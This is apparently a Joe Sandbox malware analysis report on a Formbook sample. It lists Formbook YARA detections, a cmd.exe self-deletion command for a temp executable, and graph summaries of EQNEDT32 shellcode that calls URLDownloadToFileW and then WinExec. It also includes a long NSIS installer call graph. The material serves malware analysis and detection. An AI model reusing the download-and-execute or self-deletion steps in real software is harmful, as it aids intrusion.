                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                Target ID:8
                                Start time:13:26:27
                                Start date:14/11/2023
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0xff2f0000
                                File size:3'229'696 bytes
                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:9
                                Start time:13:26:27
                                Start date:14/11/2023
                                Path:C:\Windows\SysWOW64\autochk.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\SysWOW64\autochk.exe
                                Imagebase:0x840000
                                File size:668'160 bytes
                                MD5 hash:F88A52EB62019D6A62FDD9E08034DBD8
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:10
                                Start time:13:26:27
                                Start date:14/11/2023
                                Path:C:\Windows\SysWOW64\chkdsk.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                Imagebase:0x5e0000
                                File size:16'384 bytes
                                MD5 hash:A01E18A156825557A24A643A2547AA8C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                Target ID:11
                                Start time:13:26:31
                                Start date:14/11/2023
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
                                Imagebase:0x4a330000
                                File size:302'592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:53.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:87.5%
                                  Total number of Nodes:32
                                  Total number of Limit Nodes:2
                                  execution_graph (rendered graph not recoverable; node and API summary): 36bb92b LoadLibraryW -> 36bb953 -> 36bb956 -> 36bb964 URLDownloadToFileW (also reached via 36bb940 -> 36bb9b5 URLDownloadToFileW and 36bb947 -> 36bba50 URLDownloadToFileW) -> 36bba6d -> 36bba59 -> 36bba9b -> 36bba9e WinExec -> 36bbabb -> 36bbabe ExitProcess, GetPEB -> 36bbad0

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph (rendered graph not recoverable; functions and call edges): Function_036BB92B calls Function_036BBA9B, Function_036BBAEA, Function_036BBA6D, Function_036BB953, Function_036BBA50; Function_036BB953 calls Function_036BBA9B, Function_036BBAEA, Function_036BBA6D, Function_036BBA50; Function_036BBA50 calls Function_036BBA9B, Function_036BBAEA, Function_036BBA6D; Function_036BBA6D calls Function_036BBA9B; Function_036BBA9B calls Function_036BBABB, Function_036BBAEA; Function_036BBABB calls Function_036BBAEA; Function_036AC0EA, Function_036BBB3B and Function_036AC0D5 have no edges

                                  Control-flow Graph

                                  APIs
                                  • LoadLibraryW.KERNEL32 ref: 036BB939
                                    • Part of subcall function 036BB953: URLDownloadToFileW.URLMON(00000000,036BB964,?,00000000,00000000), ref: 036BBA52
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFileLibraryLoad
                                  • String ID:
                                  • API String ID: 2776762486-0
                                  • Opcode ID: 443befbf59797b223845273d0ae4ec6a704aaeb0a51e3196c3d5397d435c913e
                                  • Instruction ID: edb149d864f430d272956df2a21e35b765f832a398ae652c1318ede1fc24a506
                                  • Opcode Fuzzy Hash: 443befbf59797b223845273d0ae4ec6a704aaeb0a51e3196c3d5397d435c913e
                                  • Instruction Fuzzy Hash: 8551F2A284C7C56FCB27D7304D7AA91BF706A63104B0DCACED8D60B4A3E399A145CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic-block rendering not recoverable): entry block 36bba9b-36bbab0 calls WinExec then 36bbabb; blocks span 36bba9b-36bbb38, including 36bbab6-36bbacd ExitProcess GetPEB and 36bbad0-36bbae1 call 36bbaea
                                  APIs
                                  • WinExec.KERNEL32(?,00000001,?,036BBA93,?,036BBA59), ref: 036BBAA8
                                    • Part of subcall function 036BBABB: ExitProcess.KERNELBASE(00000000,?,036BBAAF,?,036BBA93,?,036BBA59), ref: 036BBAC0
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: ExecExitProcess
                                  • String ID:
                                  • API String ID: 4112423671-0
                                  • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                  • Instruction ID: b448b56ce790a4e4748b08e4fbec74fa40a1b613fa94537d9d2726f66039ad7c
                                  • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                                  • Instruction Fuzzy Hash: F6F0FF59D0825261CB34E2288A55BFBAFB0EB41300FCC8857D8910718DDDA880C38F29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic-block rendering not recoverable): entry block 36bb953-36bb95e; 36bb95f calls 36bba50; 36bb964-36bba64 calls URLDownloadToFileW then 36bba6d; 36bba6b-36bba94 calls 36bba9b; 36bbad2-36bbada calls 36bbaea; exit block 36bbae3-36bbae7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFile
                                  • String ID:
                                  • API String ID: 1407266417-0
                                  • Opcode ID: ec886444d13e5bee6bad49637901dafcc41ef756d67cfc4fd1d71d1daf5685e5
                                  • Instruction ID: b6aede87fe319bcff610a191534072914997ccc6a974501fa08d140c978b072a
                                  • Opcode Fuzzy Hash: ec886444d13e5bee6bad49637901dafcc41ef756d67cfc4fd1d71d1daf5685e5
                                  • Instruction Fuzzy Hash: 6441FEA294C7D15FCB23D7304C6AA91BF706E63104B0DCACED4DA0A8A3E3A99141C752
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph (basic-block rendering not recoverable): entry block 36bba50-36bba52 URLDownloadToFileW; 36bba54 calls 36bba6d; 36bba6b-36bba94 calls 36bba9b; 36bbad2-36bbada calls 36bbaea; exit block 36bbae3-36bbae7
                                  APIs
                                  • URLDownloadToFileW.URLMON(00000000,036BB964,?,00000000,00000000), ref: 036BBA52
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
                                  Similarity
                                  • API ID: DownloadFile
                                  • String ID:
                                  • API String ID: 1407266417-0
                                  • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                  • Instruction ID: 84b85d0b8123664f15d8198fe8344fc2beb71cea498876c85127c1291265311e
                                  • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                                  • Instruction Fuzzy Hash: 2D114831E48342AAC720E654C951FEBFFB1EB82710F58C45AE5904F1C9E6E0D4C2CB29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
control_flow_graph 100 36bbabb-36bbacd ExitProcess GetPEB 102 36bbad0-36bbae1 call 36bbaea 100->102 106 36bbae3-36bbae7 102->106
APIs
• ExitProcess.KERNELBASE(00000000,?,036BBAAF,?,036BBA93,?,036BBA59), ref: 036BBAC0
Memory Dump Source
• Source File: 00000002.00000002.412621027.0000000003640000.00000004.00000020.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3640000_EQNEDT32.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
• Instruction ID: 668c4c00513f67f6b41bdda02c2bbcf49589f0e09e15c7bc31e3afb50709913a
• Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
• Instruction Fuzzy Hash: B6D0C730201206DFD200EB10CD80F6BFB7AFFE4210F24C228E4044B209C770E881CBA0
Uniqueness
• Uniqueness Score: -1.00%

Execution Graph
• Execution Coverage: 15.7%
• Dynamic/Decrypted Code Coverage: 0%
• Signature Coverage: 22.7%
• Total number of Nodes: 1291
• Total number of Limit Nodes: 23
                                  execution_graph 3656 404fc2 3657 404fe3 GetDlgItem GetDlgItem GetDlgItem 3656->3657 3658 40516e 3656->3658 3702 403e89 SendMessageA 3657->3702 3660 405177 GetDlgItem CreateThread CloseHandle 3658->3660 3661 40519f 3658->3661 3660->3661 3663 4051ca 3661->3663 3664 4051b6 ShowWindow ShowWindow 3661->3664 3665 4051ec 3661->3665 3662 405054 3668 40505b GetClientRect GetSystemMetrics SendMessageA SendMessageA 3662->3668 3666 405228 3663->3666 3670 405201 ShowWindow 3663->3670 3671 4051db 3663->3671 3704 403e89 SendMessageA 3664->3704 3667 403ebb 8 API calls 3665->3667 3666->3665 3677 405233 SendMessageA 3666->3677 3672 4051fa 3667->3672 3675 4050ca 3668->3675 3676 4050ae SendMessageA SendMessageA 3668->3676 3673 405221 3670->3673 3674 405213 3670->3674 3678 403e2d SendMessageA 3671->3678 3680 403e2d SendMessageA 3673->3680 3679 404e84 25 API calls 3674->3679 3681 4050dd 3675->3681 3682 4050cf SendMessageA 3675->3682 3676->3675 3677->3672 3683 40524c CreatePopupMenu 3677->3683 3678->3665 3679->3673 3680->3666 3685 403e54 19 API calls 3681->3685 3682->3681 3684 405bba 18 API calls 3683->3684 3686 40525c AppendMenuA 3684->3686 3687 4050ed 3685->3687 3688 405282 3686->3688 3689 40526f GetWindowRect 3686->3689 3690 4050f6 ShowWindow 3687->3690 3691 40512a GetDlgItem SendMessageA 3687->3691 3692 40528b TrackPopupMenu 3688->3692 3689->3692 3693 405119 3690->3693 3694 40510c ShowWindow 3690->3694 3691->3672 3695 405151 SendMessageA SendMessageA 3691->3695 3692->3672 3696 4052a9 3692->3696 3703 403e89 SendMessageA 3693->3703 3694->3693 3695->3672 3697 4052c5 SendMessageA 3696->3697 3697->3697 3699 4052e2 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3697->3699 3700 405304 SendMessageA 3699->3700 3700->3700 3701 405325 GlobalUnlock SetClipboardData CloseClipboard 3700->3701 3701->3672 3702->3662 3703->3691 3704->3663 3705 401cc2 3709 402a0c 3705->3709 3707 401cd2 SetWindowLongA 3708 4028be 3707->3708 3710 405bba 18 API calls 3709->3710 3711 
402a20 3710->3711 3711->3707 3712 401a43 3713 402a0c 18 API calls 3712->3713 3714 401a49 3713->3714 3715 402a0c 18 API calls 3714->3715 3716 4019f3 3715->3716 3724 402648 3725 40264b 3724->3725 3728 402663 3724->3728 3726 402658 FindNextFileA 3725->3726 3727 4026a2 3726->3727 3726->3728 3730 405b98 lstrcpynA 3727->3730 3730->3728 3734 401bca 3735 402a0c 18 API calls 3734->3735 3736 401bd1 3735->3736 3737 402a0c 18 API calls 3736->3737 3738 401bdb 3737->3738 3739 401beb 3738->3739 3740 402a29 18 API calls 3738->3740 3741 401bfb 3739->3741 3742 402a29 18 API calls 3739->3742 3740->3739 3743 401c06 3741->3743 3744 401c4a 3741->3744 3742->3741 3745 402a0c 18 API calls 3743->3745 3746 402a29 18 API calls 3744->3746 3747 401c0b 3745->3747 3748 401c4f 3746->3748 3749 402a0c 18 API calls 3747->3749 3750 402a29 18 API calls 3748->3750 3751 401c14 3749->3751 3752 401c58 FindWindowExA 3750->3752 3753 401c3a SendMessageA 3751->3753 3754 401c1c SendMessageTimeoutA 3751->3754 3755 401c76 3752->3755 3753->3755 3754->3755 3756 40424b 3757 404281 3756->3757 3758 40425b 3756->3758 3760 403ebb 8 API calls 3757->3760 3759 403e54 19 API calls 3758->3759 3761 404268 SetDlgItemTextA 3759->3761 3762 40428d 3760->3762 3761->3757 3763 4024cf 3764 402a29 18 API calls 3763->3764 3765 4024d6 3764->3765 3768 40586f GetFileAttributesA CreateFileA 3765->3768 3767 4024e2 3768->3767 2984 401751 3022 402a29 2984->3022 2986 401758 2987 401776 2986->2987 2988 40177e 2986->2988 3071 405b98 lstrcpynA 2987->3071 3072 405b98 lstrcpynA 2988->3072 2991 40177c 3028 405dfa 2991->3028 2992 401789 3073 40568b lstrlenA CharPrevA 2992->3073 2999 4017b2 CompareFileTime 3017 40179b 2999->3017 3000 401876 3038 404e84 3000->3038 3001 40184d 3003 404e84 25 API calls 3001->3003 3011 401862 3001->3011 3003->3011 3007 4018a7 SetFileTime 3008 4018b9 CloseHandle 3007->3008 3010 4018ca 3008->3010 3008->3011 3012 4018e2 3010->3012 3013 4018cf 3010->3013 3016 405bba 18 API calls 3012->3016 3015 405bba 18 API calls 3013->3015 
3014 405b98 lstrcpynA 3014->3017 3018 4018d7 lstrcatA 3015->3018 3019 4018ea 3016->3019 3017->2999 3017->3000 3017->3001 3017->3014 3037 40586f GetFileAttributesA CreateFileA 3017->3037 3076 405e93 FindFirstFileA 3017->3076 3079 405850 GetFileAttributesA 3017->3079 3082 405bba 3017->3082 3101 405459 3017->3101 3018->3019 3021 405459 MessageBoxIndirectA 3019->3021 3021->3011 3023 402a35 3022->3023 3024 405bba 18 API calls 3023->3024 3025 402a56 3024->3025 3026 402a62 3025->3026 3027 405dfa 5 API calls 3025->3027 3026->2986 3027->3026 3035 405e06 3028->3035 3029 405e6e 3030 405e72 CharPrevA 3029->3030 3033 405e8d 3029->3033 3030->3029 3031 405e63 CharNextA 3031->3029 3031->3035 3033->3017 3034 405e51 CharNextA 3034->3035 3035->3029 3035->3031 3035->3034 3036 405e5e CharNextA 3035->3036 3105 4056b6 3035->3105 3036->3031 3037->3017 3039 404e9f 3038->3039 3047 401880 3038->3047 3040 404ebc lstrlenA 3039->3040 3041 405bba 18 API calls 3039->3041 3042 404ee5 3040->3042 3043 404eca lstrlenA 3040->3043 3041->3040 3045 404ef8 3042->3045 3046 404eeb SetWindowTextA 3042->3046 3044 404edc lstrcatA 3043->3044 3043->3047 3044->3042 3045->3047 3048 404efe SendMessageA SendMessageA SendMessageA 3045->3048 3046->3045 3049 402e8e 3047->3049 3048->3047 3050 402ea4 3049->3050 3051 402ecf 3050->3051 3118 4030b3 SetFilePointer 3050->3118 3109 403081 ReadFile 3051->3109 3055 403015 3057 403019 3055->3057 3058 403031 3055->3058 3056 402eec GetTickCount 3059 402eff 3056->3059 3060 403081 ReadFile 3057->3060 3061 403081 ReadFile 3058->3061 3062 401893 3058->3062 3064 40304c WriteFile 3058->3064 3059->3062 3063 403081 ReadFile 3059->3063 3067 402f65 GetTickCount 3059->3067 3068 402f8e MulDiv wsprintfA 3059->3068 3070 402fcc WriteFile 3059->3070 3111 406025 3059->3111 3060->3062 3061->3058 3062->3007 3062->3008 3063->3059 3064->3062 3065 403061 3064->3065 3065->3058 3065->3062 3067->3059 3069 404e84 25 API calls 3068->3069 3069->3059 3070->3059 3070->3062 3071->2991 3072->2992 3074 40178f 
lstrcatA 3073->3074 3075 4056a5 lstrcatA 3073->3075 3074->2991 3075->3074 3077 405eb4 3076->3077 3078 405ea9 FindClose 3076->3078 3077->3017 3078->3077 3080 40586c 3079->3080 3081 40585f SetFileAttributesA 3079->3081 3080->3017 3081->3080 3087 405bc7 3082->3087 3083 405de1 3084 405df6 3083->3084 3126 405b98 lstrcpynA 3083->3126 3084->3017 3086 405c5f GetVersion 3094 405c6c 3086->3094 3087->3083 3087->3086 3088 405db8 lstrlenA 3087->3088 3090 405bba 10 API calls 3087->3090 3096 405dfa 5 API calls 3087->3096 3124 405af6 wsprintfA 3087->3124 3125 405b98 lstrcpynA 3087->3125 3088->3087 3090->3088 3093 405cd7 GetSystemDirectoryA 3093->3094 3094->3087 3094->3093 3095 405cea GetWindowsDirectoryA 3094->3095 3097 405bba 10 API calls 3094->3097 3098 405d61 lstrcatA 3094->3098 3099 405d1e SHGetSpecialFolderLocation 3094->3099 3119 405a7f RegOpenKeyExA 3094->3119 3095->3094 3096->3087 3097->3094 3098->3087 3099->3094 3100 405d36 SHGetPathFromIDListA CoTaskMemFree 3099->3100 3100->3094 3102 40546e 3101->3102 3103 4054ba 3102->3103 3104 405482 MessageBoxIndirectA 3102->3104 3103->3017 3104->3103 3106 4056bc 3105->3106 3107 4056cf 3106->3107 3108 4056c2 CharNextA 3106->3108 3107->3035 3108->3106 3110 402eda 3109->3110 3110->3055 3110->3056 3110->3062 3112 40604a 3111->3112 3113 406052 3111->3113 3112->3059 3113->3112 3114 4060e2 GlobalAlloc 3113->3114 3115 4060d9 GlobalFree 3113->3115 3116 406150 GlobalFree 3113->3116 3117 406159 GlobalAlloc 3113->3117 3114->3112 3114->3113 3115->3114 3116->3117 3117->3112 3117->3113 3118->3051 3120 405af0 3119->3120 3121 405ab2 RegQueryValueExA 3119->3121 3120->3094 3122 405ad3 RegCloseKey 3121->3122 3122->3120 3124->3087 3125->3087 3126->3084 3769 401651 3770 402a29 18 API calls 3769->3770 3771 401657 3770->3771 3772 405e93 2 API calls 3771->3772 3773 40165d 3772->3773 3774 401951 3775 402a0c 18 API calls 3774->3775 3776 401958 3775->3776 3777 402a0c 18 API calls 3776->3777 3778 401962 3777->3778 3779 402a29 18 API calls 3778->3779 3780 40196b 
3779->3780 3781 40197e lstrlenA 3780->3781 3782 4019b9 3780->3782 3783 401988 3781->3783 3783->3782 3787 405b98 lstrcpynA 3783->3787 3785 4019a2 3785->3782 3786 4019af lstrlenA 3785->3786 3786->3782 3787->3785 3788 4019d2 3789 402a29 18 API calls 3788->3789 3790 4019d9 3789->3790 3791 402a29 18 API calls 3790->3791 3792 4019e2 3791->3792 3793 4019e9 lstrcmpiA 3792->3793 3794 4019fb lstrcmpA 3792->3794 3795 4019ef 3793->3795 3794->3795 3796 402053 3797 402a29 18 API calls 3796->3797 3798 40205a 3797->3798 3799 402a29 18 API calls 3798->3799 3800 402064 3799->3800 3801 402a29 18 API calls 3800->3801 3802 40206d 3801->3802 3803 402a29 18 API calls 3802->3803 3804 402077 3803->3804 3805 402a29 18 API calls 3804->3805 3807 402081 3805->3807 3806 402095 CoCreateInstance 3809 40216a 3806->3809 3812 4020b4 3806->3812 3807->3806 3808 402a29 18 API calls 3807->3808 3808->3806 3810 401423 25 API calls 3809->3810 3811 40219c 3809->3811 3810->3811 3812->3809 3813 402149 MultiByteToWideChar 3812->3813 3813->3809 3814 4047d3 GetDlgItem GetDlgItem 3815 404827 7 API calls 3814->3815 3823 404a44 3814->3823 3816 4048c0 SendMessageA 3815->3816 3817 4048cd DeleteObject 3815->3817 3816->3817 3818 4048d8 3817->3818 3820 40490f 3818->3820 3822 405bba 18 API calls 3818->3822 3819 404b2e 3821 404bdd 3819->3821 3825 404a37 3819->3825 3830 404b87 SendMessageA 3819->3830 3824 403e54 19 API calls 3820->3824 3826 404bf2 3821->3826 3827 404be6 SendMessageA 3821->3827 3828 4048f1 SendMessageA SendMessageA 3822->3828 3823->3819 3846 404ab8 3823->3846 3867 404753 SendMessageA 3823->3867 3829 404923 3824->3829 3831 403ebb 8 API calls 3825->3831 3838 404c04 ImageList_Destroy 3826->3838 3839 404c0b 3826->3839 3843 404c1b 3826->3843 3827->3826 3828->3818 3834 403e54 19 API calls 3829->3834 3830->3825 3836 404b9c SendMessageA 3830->3836 3837 404dcd 3831->3837 3832 404b20 SendMessageA 3832->3819 3847 404931 3834->3847 3835 404d81 3835->3825 3844 404d93 ShowWindow GetDlgItem ShowWindow 3835->3844 3841 
404baf 3836->3841 3838->3839 3842 404c14 GlobalFree 3839->3842 3839->3843 3840 404a05 GetWindowLongA SetWindowLongA 3845 404a1e 3840->3845 3853 404bc0 SendMessageA 3841->3853 3842->3843 3843->3835 3852 40140b 2 API calls 3843->3852 3861 404c4d 3843->3861 3844->3825 3848 404a24 ShowWindow 3845->3848 3849 404a3c 3845->3849 3846->3819 3846->3832 3847->3840 3851 404980 SendMessageA 3847->3851 3854 4049ff 3847->3854 3856 4049bc SendMessageA 3847->3856 3857 4049cd SendMessageA 3847->3857 3865 403e89 SendMessageA 3848->3865 3866 403e89 SendMessageA 3849->3866 3851->3847 3852->3861 3853->3821 3854->3840 3854->3845 3856->3847 3857->3847 3858 404d57 InvalidateRect 3858->3835 3859 404d6d 3858->3859 3872 40470e 3859->3872 3860 404c7b SendMessageA 3864 404c91 3860->3864 3861->3860 3861->3864 3863 404d05 SendMessageA SendMessageA 3863->3864 3864->3858 3864->3863 3865->3825 3866->3823 3868 4047b2 SendMessageA 3867->3868 3869 404776 GetMessagePos ScreenToClient SendMessageA 3867->3869 3870 4047aa 3868->3870 3869->3870 3871 4047af 3869->3871 3870->3846 3871->3868 3875 404649 3872->3875 3874 404723 3874->3835 3876 40465f 3875->3876 3877 405bba 18 API calls 3876->3877 3878 4046c3 3877->3878 3879 405bba 18 API calls 3878->3879 3880 4046ce 3879->3880 3881 405bba 18 API calls 3880->3881 3882 4046e4 lstrlenA wsprintfA SetDlgItemTextA 3881->3882 3882->3874 3883 404dd4 3884 404de2 3883->3884 3885 404df9 3883->3885 3886 404de8 3884->3886 3901 404e62 3884->3901 3887 404e07 IsWindowVisible 3885->3887 3890 404e1e 3885->3890 3891 403ea0 SendMessageA 3886->3891 3889 404e14 3887->3889 3887->3901 3888 404e68 CallWindowProcA 3892 404df2 3888->3892 3893 404753 5 API calls 3889->3893 3890->3888 3902 405b98 lstrcpynA 3890->3902 3891->3892 3893->3890 3895 404e4d 3903 405af6 wsprintfA 3895->3903 3897 404e54 3898 40140b 2 API calls 3897->3898 3899 404e5b 3898->3899 3904 405b98 lstrcpynA 3899->3904 3901->3888 3902->3895 3903->3897 3904->3901 3905 4061d4 3911 406058 3905->3911 3906 4069c3 3907 4060e2 
GlobalAlloc 3907->3906 3907->3911 3908 4060d9 GlobalFree 3908->3907 3909 406150 GlobalFree 3910 406159 GlobalAlloc 3909->3910 3910->3906 3910->3911 3911->3906 3911->3907 3911->3908 3911->3909 3911->3910 3912 402256 3913 40225e 3912->3913 3918 402264 3912->3918 3914 402a29 18 API calls 3913->3914 3914->3918 3915 402a29 18 API calls 3917 402274 3915->3917 3916 402282 3920 402a29 18 API calls 3916->3920 3917->3916 3919 402a29 18 API calls 3917->3919 3918->3915 3918->3917 3919->3916 3921 40228b WritePrivateProfileStringA 3920->3921 3922 4014d6 3923 402a0c 18 API calls 3922->3923 3924 4014dc Sleep 3923->3924 3926 4028be 3924->3926 3927 40245a 3937 402b33 3927->3937 3929 402464 3930 402a0c 18 API calls 3929->3930 3931 40246d 3930->3931 3932 402490 RegEnumValueA 3931->3932 3933 402484 RegEnumKeyA 3931->3933 3935 40268f 3931->3935 3934 4024a9 RegCloseKey 3932->3934 3932->3935 3933->3934 3934->3935 3938 402a29 18 API calls 3937->3938 3939 402b4c 3938->3939 3940 402b5a RegOpenKeyExA 3939->3940 3940->3929 3941 4022da 3942 40230a 3941->3942 3943 4022df 3941->3943 3945 402a29 18 API calls 3942->3945 3944 402b33 19 API calls 3943->3944 3946 4022e6 3944->3946 3947 402311 3945->3947 3948 402a29 18 API calls 3946->3948 3951 402327 3946->3951 3952 402a69 RegOpenKeyExA 3947->3952 3950 4022f7 RegDeleteValueA RegCloseKey 3948->3950 3950->3951 3957 402a94 3952->3957 3961 402ae0 3952->3961 3953 402aba RegEnumKeyA 3954 402acc RegCloseKey 3953->3954 3953->3957 3955 405f28 5 API calls 3954->3955 3958 402adc 3955->3958 3956 402af1 RegCloseKey 3956->3961 3957->3953 3957->3954 3957->3956 3959 402a69 5 API calls 3957->3959 3960 402b0c RegDeleteKeyA 3958->3960 3958->3961 3959->3957 3960->3961 3961->3951 3962 40155b 3963 401565 3962->3963 3964 401577 ShowWindow 3963->3964 3965 40157e 3963->3965 3964->3965 3966 40158c ShowWindow 3965->3966 3967 4028be 3965->3967 3966->3967 3975 401cde GetDlgItem GetClientRect 3976 402a29 18 API calls 3975->3976 3977 401d0e LoadImageA SendMessageA 3976->3977 3978 
401d2c DeleteObject 3977->3978 3979 4028be 3977->3979 3978->3979 3980 401dde 3981 402a29 18 API calls 3980->3981 3982 401de4 3981->3982 3983 402a29 18 API calls 3982->3983 3984 401ded 3983->3984 3985 402a29 18 API calls 3984->3985 3986 401df6 3985->3986 3987 402a29 18 API calls 3986->3987 3988 401dff 3987->3988 3989 401423 25 API calls 3988->3989 3990 401e06 ShellExecuteA 3989->3990 3991 401e33 3990->3991 3992 401662 3993 402a29 18 API calls 3992->3993 3994 401669 3993->3994 3995 402a29 18 API calls 3994->3995 3996 401672 3995->3996 3997 402a29 18 API calls 3996->3997 3998 40167b MoveFileA 3997->3998 3999 40168e 3998->3999 4005 401687 3998->4005 4001 405e93 2 API calls 3999->4001 4003 40219c 3999->4003 4000 401423 25 API calls 4000->4003 4002 40169d 4001->4002 4002->4003 4004 4058e6 40 API calls 4002->4004 4004->4005 4005->4000 4006 401ee2 4007 402a29 18 API calls 4006->4007 4008 401ee9 4007->4008 4009 405f28 5 API calls 4008->4009 4010 401ef8 4009->4010 4011 401f10 GlobalAlloc 4010->4011 4016 401f78 4010->4016 4012 401f24 4011->4012 4011->4016 4013 405f28 5 API calls 4012->4013 4014 401f2b 4013->4014 4015 405f28 5 API calls 4014->4015 4017 401f35 4015->4017 4017->4016 4021 405af6 wsprintfA 4017->4021 4019 401f6c 4022 405af6 wsprintfA 4019->4022 4021->4019 4022->4016 4023 4023e2 4024 402b33 19 API calls 